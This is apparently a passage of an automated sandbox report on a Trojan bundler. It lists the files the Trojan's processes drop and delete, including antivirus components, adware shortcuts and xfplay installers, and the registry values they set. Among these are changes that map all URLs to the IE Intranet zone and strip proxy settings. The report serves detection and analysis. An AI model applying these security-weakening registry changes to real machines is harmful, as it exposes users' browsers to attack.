%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RAV_DL (0 bytes)
%Program Files%\Rising\RAV (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (0 bytes)
%Program Files%\Rising (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\irg[1].ashx (0 bytes)
%Program Files%\RsTest.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\ErrorNet[1].htm (0 bytes)
The process 9158.exe:3012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process xianfengupdate.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\网å€导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\å¿«æÂ·å¯¼èˆª\打折网è´Â.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\全国最给力充值店-æ·˜å®Â网.url (46 bytes)
%Documents and Settings%\All Users\Desktop\网å€导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\全国最给力充值店-æ·˜å®Â网.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\打折网è´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\打折网è´Â.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\å¿«æÂ·å¯¼èˆª\网å€导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)
The Trojan deletes the following file(s):
%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (0 bytes)
The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\xfplay\tools.exe (1530 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2566 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3345 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (0 bytes)
%Program Files%\xfplay\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
Registry activity
The process 9158chat2_ktv088_63.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"
[HKLM\SOFTWARE\9158web]
"StartTime" = "11070701"
[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\9158Service]
"LastPlat" = "51"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓÆµ]
"DisplayVersion" = "6.940"
"DisplayName" = "9158¶àÈËÊÓÆµ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158¶àÈËÊÓÆµ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F B0 73 C9 4C FA 32 79 A2 41 44 B1 71 CD D1 E0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓÆµ]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "Ìì¸ñ¿Æ¼¼£¨º¼Öã©ÓÃÂÃÂÞ¹«Ë¾"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158¶àÈËÊÓÆµ]
"URLInfoAbout" = "http://www.9158.com/"
The process sr.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA EA 78 7D 63 CE F0 13 1F C2 0F EA A3 C0 FB 44"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 9158IE.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E B7 9E F5 94 82 B8 48 BB 6E 0E 52 D8 BA F0 0C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
